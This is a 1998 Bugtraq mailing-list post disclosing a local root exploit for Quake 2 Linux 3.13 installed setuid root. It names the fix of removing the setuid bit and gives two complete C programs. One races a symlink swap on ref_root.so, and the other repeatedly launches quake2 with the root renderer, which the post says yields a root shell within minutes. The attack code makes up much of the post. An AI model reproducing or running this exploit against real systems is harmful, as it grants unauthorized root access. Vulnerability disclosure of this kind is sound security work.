Bugtraq mailing list archives
Quake 2 Linux 3.13 - ref_root.so still works
From: kevingeo () CRUZIO COM (kevingeo () CRUZIO COM)
Date: Wed, 25 Feb 1998 08:49:10 -0500
Vulnerable: Everyone who followed the installation instructions and made Quake2 setuid root. Solution: chmod u-s quake2. Exploit: In version 3.13, Quake2 trys to protect itself by checking the permissions of a library before loading it. This just introduces a race condition. Simply find a file that is owned by root and has 0700 permissions, call ref_root.so ref_root.real.so, run e.c (./e /usr/games/quake2/ref_soft.so &, for example) in background, and then run f.c. You'll have a root shell after a few minutes. e.c: #include <unistd.h> void main(int argc, char **argv) { while(1) { unlink("ref_root.so"); symlink(argv[1],"ref_root.so"); unlink("ref_root.so"); symlink("ref_root.real.so","ref_root.so"); } } f.c: #include <stdlib.h> void main() { while (1) { system("/usr/games/quake/quake2 +set vid_ref root"); } }
Current thread:
- /usr/dt/bin/dtappgather exploit Mastoras (Feb 23)
- Re: /usr/dt/bin/dtappgather exploit J.A. Gutierrez (Feb 24)
- AOL Instant Messanger Bug Aleph One (Feb 24)
- Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files kevingeo () CRUZIO COM (Feb 25)
- Re: Quake 2 Linux 3.13 (and lower) allow users to read arbitrary William T Wilson (Feb 25)
- Quake 2 Linux 3.13 - ref_root.so still works kevingeo () CRUZIO COM (Feb 25)
- <Possible follow-ups>
- Re: /usr/dt/bin/dtappgather exploit Steven Goldberg - SE - Seattle WA (Feb 25)
- Re: /usr/dt/bin/dtappgather exploit J.A. Gutierrez (Feb 25)